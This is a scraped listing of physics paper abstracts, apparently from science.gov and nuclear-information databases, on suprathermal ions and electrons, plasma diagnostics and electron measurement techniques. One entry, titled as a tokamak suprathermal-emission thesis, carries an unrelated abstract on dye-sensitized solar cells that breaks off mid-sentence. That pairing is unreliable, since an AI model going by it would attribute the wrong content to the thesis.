Three candidate lower-energy sources are examined for relevance: ionospheric outflow of Fe+ escaped from ion layers altitude, charge exchange of nominal solar wind Fe+≥7, and/or solar wind transported inner source pickup Fe+ (likely formed by solar wind Fe+≥7 interaction with near sun interplanetary dust particles, IDPs). Semi-permanent ionospheric Fe+ layers form near 100 km altitude from the tons of IDPs entering Earth's atmosphere daily. Fe+ scattered from these layers is observed up to 1000 km altitude, likely escaping in strong ionospheric outflows. Using 26% of STICS's magnetosphere-dominated data at low-to-moderate geomagnetic activity levels, we demonstrate that solar wind Fe charge exchange secondaries are not an obvious Fe+ source then. Earth flyby and cruise data from Cassini/CHEMS, a nearly identical instrument, show that inner source pickup Fe+ is likely not important at suprathermal energies. Therefore, lacking any other candidate sources, it appears that ionospheric Fe+ constitutes at least an important portion of Earth's suprathermal Fe+, comparable to observations at Saturn where ionospheric origin suprathermal Fe+ has also been observed. 19. Correcting PSP electron measurements for the effects of spacecraft electrostatic and magnetic fields Science.gov (United States) McGinnis, D.; Halekas, J. S.; Larson, D. E.; Whittlesey, P. L.; Kasper, J. C. 2017-12-01 The near-Sun environment which the Parker Solar Probe will investigate presents a unique challenge for the measurement of thermal and suprathermal electrons. Over one orbital period, the ionizing photon flux and charged particle densities vary to such an extent that the spacecraft could charge to electrostatic potentials ranging from a few volts to tens of volts or more, and it may even develop negative electrostatic potentials near closest approach. In addition, significant permanent magnetic fields from spacecraft components will perturb thermal electron trajectories. Given these effects, electron distribution function (EDF) measurements made by the SWEAP/SPAN electron sensors will be significantly affected. It is thus important to try to understand the extent and nature of such effects, and to remediate them as much as possible. To this end, we have incorporated magnetic fields and a model electrostatic potential field into particle tracing simulations to predict particle trajectories through the near spacecraft environment. These simulations allow us to estimate how the solid angle elements measured by SPAN deflect and stretch in the presence of these fields and therefore how and to what extent EDF measurements will be distorted. In this work, we demonstrate how this technique can be used to produce a `dewarping' correction factor. Further, we show that this factor can correct synthetic datasets simulating the warped EDFs that the SPAN instruments are likely to measure over a wide range of spacecraft potentials and plasma Debye lengths. 20. Studies of suprathermal emission due to cyclotron-electronic heating of the tokamak TCV plasma; Etudes du rayonnement suprathermique emis lors du chauffage cyclotronique electronique du plasma du tokamak TCV Energy Technology Data Exchange (ETDEWEB) Blanchard, P 2002-07-01 Photo sensitization of wide band gap semiconductors is used in a wide range of application like silver halide photography and xerography. The development of a new type of solar cells, based on the sensitization of meso porous metal oxide films by panchromatic dyes, has triggered a lot of fundamental research on electron transfer dynamics. Upon excitation, the sensitizer transfers an electron in the conduction band of the semiconductor. Recombination of the charge separated state is prevented by the fast regeneration of the dye by an electron donor present in solution. Until recently, most of the work in this area has been focused on the competition between the recombination and the regeneration processes, which take place in the nanosecond to millisecond regime. With the development of solid-state femtosecond laser, the measurement of the dynamics of the first electron transfer step occurring in the solar cell has become possible . Electron injection from ruthenium(Il) poly pyridyl complexes into titanium dioxide has been found to occur with a poly exponential rate, with time constants ranging from < 100 fs up to > 10 ps. In spite of the lately acquired capacity to measure the dynamics of these reactions, the physical meaning of this poly exponential kinetics and the factors that can influence this process are still poorly understood. In this work, the development of a new femtosecond pump-probe spectrometer, intended to monitor the ultrafast dynamics of electron injection, is presented. The study of this process requires an excellent temporal resolution and a large wavelength tunability to be able to excite a great variety of dyes and to probe the different products of the reaction. These specifications were met using the latest progress made in optical parametric amplification, which allowed the construction of a versatile experimental set-up. The interfacing by computer of the different devices used during the experiments increase the ease of use of the set 1. Electron shower transverse profile measurement International Nuclear Information System (INIS) Lednev, A.A. 1993-01-01 A method to measure the shower transverse profile is described. Calibration data of the lead-glass spectrometer GAMS collected in a wide electron beam without any additional coordinate detector are used. The method may be used for the measurements in both cellular- and projective-type spectrometers. The results of measuring the 10 GeV electron shower profile in the GAMS spectrometer, without optical grease between the lead-glass radiators and photomultipliers, are approximated with an analytical function. The estimate of the coordinate accuracy is obtained. 5 refs., 8 figs 2. Charged particle measurements from a rocket-borne electron accelerator experiment International Nuclear Information System (INIS) Duprat, G.R.J.; McNamara, A.G.; Whalen, B.A. 1982-01-01 This chapter presents charged particle observations which relate to the spatial distribution of energetic (keV) charged particles surrounding the accelerator during gun firings, the energy distribution of energetic electrons produced in the plasma by the electron beam, and the dependence of these characteristics on the beam energy, current, and injection angle. The primary objective of the flight of the Nike Black Brant rocket (NUB-06) was to use an electron beam to probe the auroral field lines for electric fields parallel to the magnetic field. The secondary objectives were to study electron beam interactions in the ionosphere and spacecraft charging effects. It is demonstrated that during high current (greater than or equal to 10ma electron beam firings, an intense suprathermal as well as energetic electron population is created on flux tubes near the beam. Certain similarities exist between these measurements and corresponding ones made in the Houston vacuum tank suggesting that the same instability observed in the laboratory is occurring at high altitudes in the ionosphere 3. Modelling of non-thermal electron cyclotron emission during ECRH International Nuclear Information System (INIS) Tribaldos, V.; Krivenski, V. 1990-01-01 The existence of suprathermal electrons during Electron Cyclotron Resonance Heating experiments in tokamaks is today a well established fact. At low densities the creation of large non-thermal electron tails affects the temperature profile measurements obtained by 2 nd harmonic, X-mode, low-field side, electron cyclotron emission. At higher densities suprathermal electrons can be detected by high-field side emission. In electron cyclotron current drive experiments a high energy suprathermal tail, asymmetric in v, is observed. Non-Maxwellian electron distribution functions are also typically observed during lower-hybrid current drive experiments. Fast electrons have been observed during ionic heating by neutral beams as well. Two distinct approaches are currently used in the interpretation of the experimental results: simple analytical models which reproduce some of the expected non-Maxwellian characteristics of the electron distribution function are employed to get a qualitative picture of the phenomena; sophisticated numerical Fokker-Planck calculations give the electron distribution function from which the emission spectra are computed. No algorithm is known to solve the inverse problem, i.e. to compute the electron distribution function from the emitted spectra. The proposed methods all relay on the basic assumption that the electron distribution function has a given functional dependence on a limited number of free parameters, which are then 'measured' by best fitting the experimental results. Here we discuss the legitimacy of this procedure. (author) 7 refs., 5 figs 4. Interaction of supra-thermal ions with turbulence in a magnetized toroidal plasma International Nuclear Information System (INIS) Plyushchev, G. 2009-01-01 This thesis addresses the interaction of a supra-thermal ion beam with turbulence in the simple magnetized toroidal plasma of TORPEX. The first part of the Thesis deals with the ohmic assisted discharges on TORPEX. The aim of these discharges is the investigation of the open to closed magnetic field line transition. The relevant magnetic diagnostics were developed. Ohmic assisted discharges with a maximum plasma current up to 1 kA are routinely obtained. The equilibrium conditions on the vacuum magnetic field configuration were investigated. In the second part of the Thesis, the design of the fast ion source and detector are discussed. The accelerating electric field needed for the fast ion source was optimized. The fast ion source was constructed and commissioned. To detect the fast ions a specially designed gridded energy analyzer was used. The electron energy distribution function was obtained to demonstrate the efficiency of the detector. The experiments with the fast ion beam were conducted in different plasma regions of TORPEX. In the third part of the Thesis, numerical simulations are used to interpret the measured fast ion beam behavior. It is shown that a simple single particle equation of motion explains the beam behavior in the experiments in the absence of plasma. To explain the fast ion beam experiments with the plasma a turbulent electric field must be used. The model that takes into account this turbulent electrical field qualitatively explains the shape of the fast ion current density profile in the different plasma regions of TORPEX. The vertically elongated fast ion current density profiles are explained by a spread in the fast ion velocity distribution. The theoretically predicted radial fast ion beam spreading due to the turbulent electric field was observed in the experiment. (author) 5. ON THE REMOTE DETECTION OF SUPRATHERMAL IONS IN THE SOLAR CORONA AND THEIR ROLE AS SEEDS FOR SOLAR ENERGETIC PARTICLE PRODUCTION Energy Technology Data Exchange (ETDEWEB) Laming, J. Martin; Moses, J. Daniel; Ko, Yuan-Kuen [Space Science Division, Naval Research Laboratory, Code 7684, Washington, DC 20375 (United States); Ng, Chee K. [College of Science, George Mason University, Fairfax, VA 22030 (United States); Rakowski, Cara E.; Tylka, Allan J. [NASA/GSFC Code 672, Greenbelt, MD 20771 (United States) 2013-06-10 Forecasting large solar energetic particle (SEP) events associated with shocks driven by fast coronal mass ejections (CMEs) poses a major difficulty in the field of space weather. Besides issues associated with CME initiation, the SEP intensities are difficult to predict, spanning three orders of magnitude at any given CME speed. Many lines of indirect evidence point to the pre-existence of suprathermal seed particles for injection into the acceleration process as a key ingredient limiting the SEP intensity of a given event. This paper outlines the observational and theoretical basis for the inference that a suprathermal particle population is present prior to large SEP events, explores various scenarios for generating seed particles and their observational signatures, and explains how such suprathermals could be detected through measuring the wings of the H I Ly{alpha} line. 6. ON THE REMOTE DETECTION OF SUPRATHERMAL IONS IN THE SOLAR CORONA AND THEIR ROLE AS SEEDS FOR SOLAR ENERGETIC PARTICLE PRODUCTION International Nuclear Information System (INIS) Laming, J. Martin; Moses, J. Daniel; Ko, Yuan-Kuen; Ng, Chee K.; Rakowski, Cara E.; Tylka, Allan J. 2013-01-01 Forecasting large solar energetic particle (SEP) events associated with shocks driven by fast coronal mass ejections (CMEs) poses a major difficulty in the field of space weather. Besides issues associated with CME initiation, the SEP intensities are difficult to predict, spanning three orders of magnitude at any given CME speed. Many lines of indirect evidence point to the pre-existence of suprathermal seed particles for injection into the acceleration process as a key ingredient limiting the SEP intensity of a given event. This paper outlines the observational and theoretical basis for the inference that a suprathermal particle population is present prior to large SEP events, explores various scenarios for generating seed particles and their observational signatures, and explains how such suprathermals could be detected through measuring the wings of the H I Lyα line. 7. Electron Energetics in the Martian Dayside Ionosphere: Model Comparisons with MAVEN Data Science.gov (United States) Sakai, Shotaro; Andersson, Laila; Cravens, Thomas E.; Mitchell, David L.; Mazelle, Christian; Rahmati, Ali; Fowler, Christopher M.; Bougher, Stephen W.; Thiemann, Edward M. B.; Epavier, Francis G.; hide 2016-01-01 This paper presents a study of the energetics of the dayside ionosphere of Mars using models and data from several instruments on board the Mars Atmosphere and Volatile EvolutioN spacecraft. In particular, calculated photoelectron fluxes are compared with suprathermal electron fluxes measured by the Solar Wind Electron Analyzer, and calculated electron temperatures are compared with temperatures measured by the Langmuir Probe and Waves experiment. The major heat source for the thermal electrons is Coulomb heating from the suprathermal electron population, and cooling due to collisional rotational and vibrational CO2 dominates the energy loss. The models used in this study were largely able to reproduce the observed high topside ionosphere electron temperatures (e.g., 3000 K at 300 km altitude) without using a topside heat flux when magnetic field topologies consistent with the measured magnetic field were adopted. Magnetic topology affects both suprathermal electron transport and thermal electron heat conduction. The effects of using two different solar irradiance models were also investigated. In particular, photoelectron fluxes and electron temperatures found using the Heliospheric Environment Solar Spectrum Radiation irradiance were higher than those with the Flare Irradiance Spectrum Model-Mars. The electron temperature is shown to affect the O2(+) dissociative recombination rate coefficient, which in turn affects photochemical escape of oxygen from Mars. 8. Observations of thermal and suprathermal tail ions from WIND Science.gov (United States) Randol, B. M.; Christian, E. R.; Wilson, L. B., III 2016-12-01 The velocity distribution function (VDF) of solar wind protons (as well as other ion populations) is comprised of a thermal Maxwellian core and an accelerated suprathermal tail, beginning at around 1 keV in the frame co-moving with solar wind bulk velocity. The form of the suprathermal tail is a power law in phase space density, f, vs. speed, v, such that f / vγ, where γ is the power law index. This commonly observed index is of particular interest because no traditional theory predicts its existence. We need more data in order to test these theories. The general shape is of interest because it is kappa-like. We show combined observations from three different instruments on the WIND spacecraft: 3DP/PLSP, STICS, and 3DP/SST/Open. These data stretch from 102 to 107 eV in energy, encompassing both the thermal and suprathermal proton populations. We show further evidence for this kappa-like distribution and report on our progress on fitting of empirical functions to these data. 9. Effect of ion suprathermality on arbitrary amplitude dust acoustic waves in a charge varying dusty plasma International Nuclear Information System (INIS) Tribeche, Mouloud; Mayout, Saliha; Amour, Rabia 2009-01-01 Arbitrary amplitude dust acoustic waves in a high energy-tail ion distribution are investigated. The effects of charge variation and ion suprathermality on the large amplitude dust acoustic (DA) soliton are then considered. The correct suprathermal ion charging current is rederived based on the orbit motion limited approach. In the adiabatic case, the variable dust charge is expressed in terms of the Lambert function and we take advantage of this transcendental function to show the existence of rarefactive variable charge DA solitons involving cusped density humps. The dust charge variation leads to an additional enlargement of the DA soliton, which is less pronounced as the ions evolve far away from Maxwell-Boltzmann distribution. In the nonadiabatic case, the dust charge fluctuation may provide an alternate physical mechanism causing anomalous dissipation the strength of which becomes important and may prevail over that of dispersion as the ion spectral index κ increases. Our results may provide an explanation for the strong spiky waveforms observed in auroral electric field measurements by Ergun et al.[Geophys. Res. Lett. 25, 2025 (1998)]. 10. Winter nightime ion temperatures and energetic electrons from 0go 6 plasma measurements International Nuclear Information System (INIS) Sanatani, S.; Breig, E.L. 1981-01-01 This paper presents and discusses ion temperature and suprathermal electron flux data acquired with the retarding potential analyzer on board the ogo 6 satellite when it was in solar eclipse. Attention is directed to measurements in the 400- to 800-km height interval between midnight and predawn in the northern winter nonpolar ionosphere. Statistical analysis of data recorded during a 1-month time span permits a decoupling of horizontal and altitude effects. A distinct longitudinal variation is observed for ion temperature above 500 km, with a significant relative enhancement over the western North Altantic Altitude distributions of ion temperature are compatible with Millstone Hill profiles within the common region of this enhancement. Large fluxes of energetic electrons are observed and extend to mush lower geomagnetic latitudes in the same longitude sector. Both a direct correlation in magnitude and a strong similarity in spatial extent are demonstrated for these ion temperature and electron flux data. The location of the limiting low-altitude boundary for observation of the electron fluxes is variable, dependent on local time and season as well as longitude. Variations in this boundary are found to be consistent with a calculated conjugate solar zenith angle of 99 0 +- 2 0 describing photoproduction of energetic electrons in the southern hemisphere. The ogo 6 data are considered to be indicative of an energy source originating in the sunlit summer hemisphere and providing heat via transport of photoelectrons to a broad but preferential segment of the winter nighttime mid-latitude ionosphere. Ions at other longitudes are without access to this energy source and cool to near the neutral temperature at heights to above 800 km inthe predawn hours 11. Measurement of femtosecond electron bunches International Nuclear Information System (INIS) Wang, D. X.; Krafft, G. A.; Sinclair, C. K. 1997-01-01 Bunch lengths as short as 84 fs (rms) have been measured at Jefferson Lab using a zero-phasing RF technique. To the best of our knowledge, this is the first accurate bunch length measurement in this regime. In this letter, an analytical approach for computing the longitudinal distribution function and bunch length is described for arbitrary longitudinal and transverse distributions. The measurement results are presented, which are in excellent agreement with numerical simulations 12. Electron cyclotron emission measurement in Tore Supra International Nuclear Information System (INIS) Javon, C. 1991-06-01 Electron cyclotron radiation from Tore-Supra is measured with Michelson and Fabry-Perot interferometers. Calibration methods, essential for this diagnostic, are developed allowing the determination of electron temperature in the plasma. In particular the feasibility of Fabry-Perot interferometer calibration by an original method is demonstrated. A simulation code is developed for modelling non-thermal electron population in these discharges using measurements in non-inductive current generation regime [fr 13. Time-resolved suprathermal x-rays International Nuclear Information System (INIS) Lee, P.H.Y.; Rosen, M.D. 1978-01-01 Temporally resolved x-ray spectra in the range of 1 to 20 keV have been obtained from gold disk targets irradiated by 1.06 μm laser pulses from the Argus facility. The x-ray streak camera used for the measurement has been calibrated for streak speed and dynamic range by using an air-gap Fabry-Perot etalon, and the instrument response has been calibrated using a multi-range monoenergetic x-ray source. The experimental results indicate that we are able to observe the ''hot'' x-ray temperature evolve in time and that the experimentally observed values can be qualitatively predicted by LASNEX code computations when the inhibited transport model is used 14. Superthermal electron distribution measurements from polarized electron cyclotron emission International Nuclear Information System (INIS) Luce, T.C.; Efthimion, P.C.; Fisch, N.J. 1988-06-01 Measurements of the superthermal electron distribution can be made by observing the polarized electron cyclotron emission. The emission is viewed along a constant magnetic field surface. This simplifies the resonance condition and gives a direct correlation between emission frequency and kinetic energy of the emitting electron. A transformation technique is formulated which determines the anisotropy of the distribution and number density of superthermals at each energy measured. The steady-state distribution during lower hybrid current drive and examples of the superthermal dynamics as the runaway conditions is varied are presented for discharges in the PLT tokamak. 15 refs., 8 figs 15. Electronic distance measurement: an introduction National Research Council Canada - National Science Library Rüeger, J. M 1990-01-01 .... It is excellently suited as a text for undergraduate and graduate students and as an invaluable reference for practicing surveyors, geodesists and other scientists using EDM as a measuring tool... 16. On the propagation of hydromagnetic waves in a plasma of thermal and suprathermal components Science.gov (United States) Kumar, Nagendra; Sikka, Himanshu 2007-12-01 The propagation of MHD waves is studied when two ideal fluids, thermal and suprathermal gases, coupled by magnetic field are moving with the steady flow velocity. The fluids move independently in a direction perpendicular to the magnetic field but gets coupled along the field. Due to the presence of flow in suprathermal and thermal fluids there appears forward and backward waves. All the forward and backward modes propagate in such a way that their rate of change of phase speed with the thermal Mach number is same. It is also found that besides the usual hydromagnetic modes there appears a suprathermal mode which propagates with faster speed. Surface waves are also examined on an interface formed with composite plasma (suprathermal and thermal gases) on one side and the other is a non-magnetized plasma. In this case, the modes obtained are two or three depending on whether the sound velocity in thermal gas is equal to or greater than the sound velocity in suprathermal gas. The results lead to the conclusion that the interaction of thermal and suprathermal components may lead to the occurrence of an additional mode called suprathermal mode whose phase velocity is higher than all the other modes. 17. A device for measuring electron beam characteristics Directory of Open Access Journals (Sweden) M. Andreev 2017-01-01 Full Text Available This paper presents a device intended for diagnostics of electron beams and the results obtained with this device. The device comprises a rotating double probe operating in conjunction with an automated probe signal collection and processing system. This provides for measuring and estimating the electron beam characteristics such as radius, current density, power density, convergence angle, and brightness. 18. Drift-time measurement electronics International Nuclear Information System (INIS) Pernicka, M. 1978-01-01 The aim of the construction was to improve the time resolution without using the facility of time stretching, to have a fast read-out possibility, and to be still cheaper in price in comparison to other systems. A possibility was thus foreseen for using the firm Fairchild. These integrated circuits (IC) have, for example, a propagation delay of 0.75 ns for a gate. One can expect therefore less time jitter and less time difference between the different inputs. Furthermore this IC offers a greater flexibility and therefore the number of ICs decreases and distances become smaller. Working with clock frequencies up to 166.6 MHz is easily possible without running into timing problems. On the other hand, to make full use of the advantages of this IC, it was necessary to build the print as a multilayer. The only risk could be in the use of a completely new product. A further aim was to build for this system a second type of drift-time module with a short time range for measuring drift time and pulse length in rotated multiwire proportional chambers. A brief outline of the specifications of the different modules is given in table 1. (Auth.) 19. A device for electron gun emittance measurement International Nuclear Information System (INIS) Aune, B.; Corveller, P.; Jablonka, M.; Joly, J.M. 1985-05-01 In order to improve the final emittance of the beam delivered by the ALS electron linac a new gun is going to be installed. To measure its emittance and evaluate the contribution of different factors to emittance growth we have developed an emittance measurement device. We describe the experimental and mathematical procedure we have followed, and give some results of measurements 20. The « 3-D donut » electrostatic analyzer for millisecond timescale electron measurements in the solar wind Science.gov (United States) Berthomier, M.; Techer, J. D. 2017-12-01 Understanding electron acceleration mechanisms in planetary magnetospheres or energy dissipation at electron scale in the solar wind requires fast measurement of electron distribution functions on a millisecond time scale. Still, since the beginning of space age, the instantaneous field of view of plasma spectrometers is limited to a few degrees around their viewing plane. In Earth's magnetosphere, the NASA MMS spacecraft use 8 state-of-the-art sensor heads to reach a time resolution of 30 milliseconds. This costly strategy in terms of mass and power consumption can hardly be extended to the next generation of constellation missions that would use a large number of small-satellites. In the solar wind, using the same sensor heads, the ESA THOR mission is expected to reach the 5ms timescale in the thermal energy range, up to 100eV. We present the « 3-D donut » electrostatic analyzer concept that can change the game for future space missions because of its instantaneous hemispheric field of view. A set of 2 sensors is sufficient to cover all directions over a wide range of energy, e.g. up to 1-2keV in the solar wind, which covers both thermal and supra-thermal particles. In addition, its high sensitivity compared to state of the art instruments opens the possibility of millisecond time scale measurements in space plasmas. With CNES support, we developed a high fidelity prototype (a quarter of the full « 3-D donut » analyzer) that includes all electronic sub-systems. The prototype weights less than a kilogram. The key building block of the instrument is an imaging detector that uses EASIC, a low-power front-end electronics that will fly on the ESA Solar Orbiter and on the NASA Parker Solar Probe missions. 1. A physical mechanism producing suprathermal populations and initiating substorms in the Earth's magnetotail Directory of Open Access Journals (Sweden) D. V. Sarafopoulos 2008-06-01 Full Text Available We suggest a candidate physical mechanism, combining there dimensional structure and temporal development, which is potentially able to produce suprathermal populations and cross-tail current disruptions in the Earth's plasma sheet. At the core of the proposed process is the "akis" structure; in a thin current sheet (TCS the stretched (tail-like magnetic field lines locally terminate into a sharp tip around the tail midplane. At this sharp tip of the TCS, ions become non-adiabatic, while a percentage of electrons are accumulated and trapped: The strong and transient electrostatic electric fields established along the magnetic field lines produce suprathermal populations. In parallel, the tip structure is associated with field aligned and mutually attracted parallel filamentary currents which progressively become more intense and inevitably the structure collapses, and so does the local TCS. The mechanism is observationally based on elementary, almost autonomous and spatiotemporal entities that correspond each to a local thinning/dipolarization pair having duration of ~1 min. Energetic proton and electron populations do not occur simultaneously, and we infer that they are separately accelerated at local thinnings and dipolarizations, respectively. In one example energetic particles are accelerated without any dB/dt variation and before the substorm expansion phase onset. A particular effort is undertaken demonstrating that the proposed acceleration mechanism may explain the plasma sheet ratio Ti/Te≈7. All our inferences are checked by the highest resolution datasets obtained by the Geotail Energetic Particles and Ion Composition (EPIC instrument. The energetic particles are used as the best diagnostics for the accelerating source. Near Earth (X≈10 RE selected events support our basic concept. The proposed mechanism seems to reveal a fundamental building block of the substorm phenomenon and may be the basic process/structure, which is now 2. Transmission Electron Microscope Measures Lattice Parameters Science.gov (United States) Pike, William T. 1996-01-01 Convergent-beam microdiffraction (CBM) in thermionic-emission transmission electron microscope (TEM) is technique for measuring lattice parameters of nanometer-sized specimens of crystalline materials. Lattice parameters determined by use of CBM accurate to within few parts in thousand. Technique developed especially for use in quantifying lattice parameters, and thus strains, in epitaxial mismatched-crystal-lattice multilayer structures in multiple-quantum-well and other advanced semiconductor electronic devices. Ability to determine strains in indivdual layers contributes to understanding of novel electronic behaviors of devices. 3. Suprathermal fusion reactions in laser-imploded D-T pellets. Applicability to pellet diagnosis and necessity of nuclear data International Nuclear Information System (INIS) Tabaru, Y.; Nakao, Y.; Kudo, K.; Nakashima, H. 1995-01-01 The suprathermal fusion reaction is examined on the basis of coupled transport/hydrodynamic calculation. We also calculate the energy spectrum of neutrons bursting from DT pellet. Because of suprathermal fusion and rapid pellet expansion, these neutrons contain fast components whose maximum energy reachs about 40 MeV. The pellet ρR diagnosis by the detection of suprathermal fusion neutrons is discussed. (author) 4. Proceedings of eighth joint workshop on electron cyclotron emission and electron cyclotron resonance heating. Vol. 1 International Nuclear Information System (INIS) 1993-03-01 The theory of electron cyclotron resonance phenomena is highly developed. The main theoretical tools are well established, generally accepted and able to give a satisfactory description of the main results obtained in electron cyclotron emission, absorption and current drive experiments. In this workshop some advanced theoretical and numerical tools have been presented (e.g., 3-D Fokker-Planck codes, treatment of the r.f. beam as a whole, description of non-linear and finite-beam effects) together with the proposal for new scenarios for ECE and ECA measurements (e.g., for diagnosing suprathermal populations and their radial transport). (orig.) 5. Proceedings of eighth joint workshop on electron cyclotron emission and electron cyclotron resonance heating. Vol. 2 International Nuclear Information System (INIS) 1993-03-01 The theory of electron cyclotron resonance phenomena is highly developed. The main theoretical tools are well established, generally accepted and able to give a satisfactory description of the main results obtained in electron cyclotron emission, absorption and current drive experiments. In this workshop some advanced theoretical and numerical tools have been presented (e.g., 3-D Fokker-Planck codes, treatment of the r.f. beam as a whole, description of non-linear and finite-beam effects) together with the proposal for new scenarios for ECE and ECA measurements (e.g., for diagnosing suprathermal populations and their radial transport). (orig.) 6. Dark field electron holography for strain measurement Energy Technology Data Exchange (ETDEWEB) Beche, A., E-mail: [email protected] [CEA-Grenoble, INAC/SP2M/LEMMA, F-38054 Grenoble (France); Rouviere, J.L. [CEA-Grenoble, INAC/SP2M/LEMMA, F-38054 Grenoble (France); Barnes, J.P.; Cooper, D. [CEA-LETI, Minatec Campus, F-38054 Grenoble (France) 2011-02-15 Dark field electron holography is a new TEM-based technique for measuring strain with nanometer scale resolution. Here we present the procedure to align a transmission electron microscope and obtain dark field holograms as well as the theoretical background necessary to reconstruct strain maps from holograms. A series of experimental parameters such as biprism voltage, sample thickness, exposure time, tilt angle and choice of diffracted beam are then investigated on a silicon-germanium layer epitaxially embedded in a silicon matrix in order to obtain optimal dark field holograms over a large field of view with good spatial resolution and strain sensitivity. -- Research Highlights: {yields} Step by step explanation of the dark field electron holography technique. {yields} Presentation of the theoretical equations to obtain quantitative strain map. {yields} Description of experimental parameters influencing dark field holography results. {yields} Quantitative strain measurement on a SiGe layer embedded in a silicon matrix. 7. Polystyrene calorimeter for electron beam dose measurements DEFF Research Database (Denmark) Miller, A. 1995-01-01 Calorimeters from polystrene have been constructed for dose measurement at 4-10 MeV electron accelerators. These calorimeters have been used successfully for a few years, and polystyrene calorimeters for use at energies down to 1 MeV and being tested. Advantage of polystyrene as the absorbing... 8. Electronic instrumentation system for pulsed neutron measurements International Nuclear Information System (INIS) Burda, J.; Igielski, A.; Kowalik, W. 1982-01-01 An essential point of pulsed neutron measurement of thermal neutron parameters for different materials is the registration of the thermal neutron die-away curve after a fast neutron bursts have been injected into the system. An electronic instrumentation system which is successfully applied for pulsed neutron measurements is presented. An important part of the system is the control unit which has been designed and built in the Laboratory of Neutron Parameters of Materials. (author) 9. Temperature measurement systems in wearable electronics Science.gov (United States) Walczak, S.; Gołebiowski, J. 2014-08-01 The aim of this paper is to present the concept of temperature measurement system, adapted to wearable electronics applications. Temperature is one of the most commonly monitored factor in smart textiles, especially in sportswear, medical and rescue products. Depending on the application, measured temperature could be used as an initial value of alert, heating, lifesaving or analysis system. The concept of the temperature measurement multi-point system, which consists of flexible screen-printed resistive sensors, placed on the T-shirt connected with the central unit and the power supply is elaborated in the paper. 10. Opacity broadening and interpretation of suprathermal CO linewidths: Macroscopic turbulence and tangled molecular clouds Science.gov (United States) Hacar, A.; Alves, J.; Burkert, A.; Goldsmith, P. 2016-06-01 Context. Since their first detection in the interestellar medium, (sub-)millimeter line observations of different CO isotopic variants have routinely been employed to characterize the kinematic properties of the gas in molecular clouds. Many of these lines exhibit broad linewidths that greatly exceed the thermal broadening expected for the low temperatures found within these objects. These observed suprathermal CO linewidths are assumed to originate from unresolved supersonic motions inside clouds. Aims: The lowest rotational J transitions of some of the most abundant CO isotopologues, 12CO and 13CO, are found to present large optical depths. In addition to well-known line saturation effects, these large opacities present a non-negligible contribution to their observed linewidths. Typically overlooked in the literature, in this paper we aim to quantify the impact of these opacity broadening effects on the current interpretation of the CO suprathermal line profiles. Methods: Combining large-scale observations and LTE modeling of the ground J = 1-0 transitions of the main 12CO, 13CO, C18O isotopologues, we have investigated the correlation of the observed linewidths as a function of the line opacity in different regions of the Taurus molecular cloud. Results: Without any additional contributions to the gas velocity field, a large fraction of the apparently supersonic (ℳ ~ 2-3) linewidths measured in both 12CO and 13CO (J = 1-0) lines can be explained by the saturation of their corresponding sonic-like, optically thin C18O counterparts assuming standard isotopic fractionation. Combined with the presence of multiple components detected in some of our C18O spectra, these opacity effects also seem to be responsible for most of the highly supersonic linewidths (ℳ > 8-10) detected in some of the broadest 12CO and 13CO spectra in Taurus. Conclusions: Our results demonstrate that most of the suprathermal 12CO and 13CO linewidths reported in nearby clouds like Taurus 11. Measurement of Electron Cloud Effects in SPS CERN Document Server Jiménez, J M 2004-01-01 The electron cloud is not a new phenomenon, indeed, it was observed already in other machines like the proton storage rings in BINP Novosibirsk or in the Intersecting Storage Ring (ISR) at CERN. Inside an accelerator beam pipe, the electrons can collectively and coherently interact with the beam potential and degrade the performance of the accelerators operating with intense positively charged bunched beams. In the LHC, electron multipacting is expected to take place in the cold and warm beam pipe due to the presence of the high intensities bunched beams, creating an electron cloud. The additional heat load induced by the electron cloud onto the LHC beam screens of the cold magnets of the LHC bending sections (the arcs represent ~21 km in length) was, and is still, considered as one of the main possible limitation of LHC performances. Since 1997 and in parallel with the SPS studies with LHC-type beams, measurements in other machines or in the laboratory have been made to provide the input parameters required ... 12. Quantitative biological measurement in Transmission Electron Tomography International Nuclear Information System (INIS) Mantell, Judith M; Verkade, Paul; Arkill, Kenton P 2012-01-01 It has been known for some time that biological sections shrink in the transmission electron microscope from exposure to the electron beam. This phenomenon is especially important in Electron Tomography (ET). The effect on shrinkage of parameters such as embedding medium or sample type is less well understood. In addition anisotropic area shrinkage has largely been ignored. The intention of this study is to explore the shrinkage on a number of samples ranging in thickness from 200 nm to 500 nm. A protocol was developed to determine the shrinkage in area and thickness using the gold fiducials used in electron tomography. In brief: Using low dose philosophy on the section, a focus area was used prior to a separate virgin study area for a series of known exposures on a tilted sample. The shrinkage was determined by measurements on the gold beads from both sides of the section as determined by a confirmatory tomogram. It was found that the shrinkage in area (approximately to 90-95% of the original) and the thickness (approximately 65% of the original at most) agreed with pervious authors, but that a lmost all the shrinkage was in the first minute and that although the direction of the in-plane shrinkage (in x and y) was sometimes uneven the end result was consistent. It was observed, in general, that thinner samples showed more percentage shrinkage than thicker ones. In conclusion, if direct quantitative measurements are required then the protocol described should be used for all areas studied. 13. Quantitative biological measurement in Transmission Electron Tomography Science.gov (United States) Mantell, Judith M.; Verkade, Paul; Arkill, Kenton P. 2012-07-01 It has been known for some time that biological sections shrink in the transmission electron microscope from exposure to the electron beam. This phenomenon is especially important in Electron Tomography (ET). The effect on shrinkage of parameters such as embedding medium or sample type is less well understood. In addition anisotropic area shrinkage has largely been ignored. The intention of this study is to explore the shrinkage on a number of samples ranging in thickness from 200 nm to 500 nm. A protocol was developed to determine the shrinkage in area and thickness using the gold fiducials used in electron tomography. In brief: Using low dose philosophy on the section, a focus area was used prior to a separate virgin study area for a series of known exposures on a tilted sample. The shrinkage was determined by measurements on the gold beads from both sides of the section as determined by a confirmatory tomogram. It was found that the shrinkage in area (approximately to 90-95% of the original) and the thickness (approximately 65% of the original at most) agreed with pervious authors, but that a lmost all the shrinkage was in the first minute and that although the direction of the in-plane shrinkage (in x and y) was sometimes uneven the end result was consistent. It was observed, in general, that thinner samples showed more percentage shrinkage than thicker ones. In conclusion, if direct quantitative measurements are required then the protocol described should be used for all areas studied. 14. Suprathermal He{sup 2+} in the Earth`s foreshock region Energy Technology Data Exchange (ETDEWEB) Fuselier, S.A. [Lockheed Palo Alto Research Lab., CA (United States); Thomsen, M.F. [Los Alamos National Lab., NM (United States); Ipavich, F.M. [Univ. of Maryland, College Park, MD (United States); Schmidt, W.K.H. [Max-Planck-Institut fuer Aeronomie, Katlenburg-Lindau (Germany) 1995-09-01 ISEE 1 and 2 H{sup +} and He{sup 2+} observations upstream from the Earth`s bow shock are used to investigate the origin of energetic (or diffuse) ion distributions. Diffuse ion distributions have energies from a few keV/e to > 100 keV/e and have near solar wind concentrations 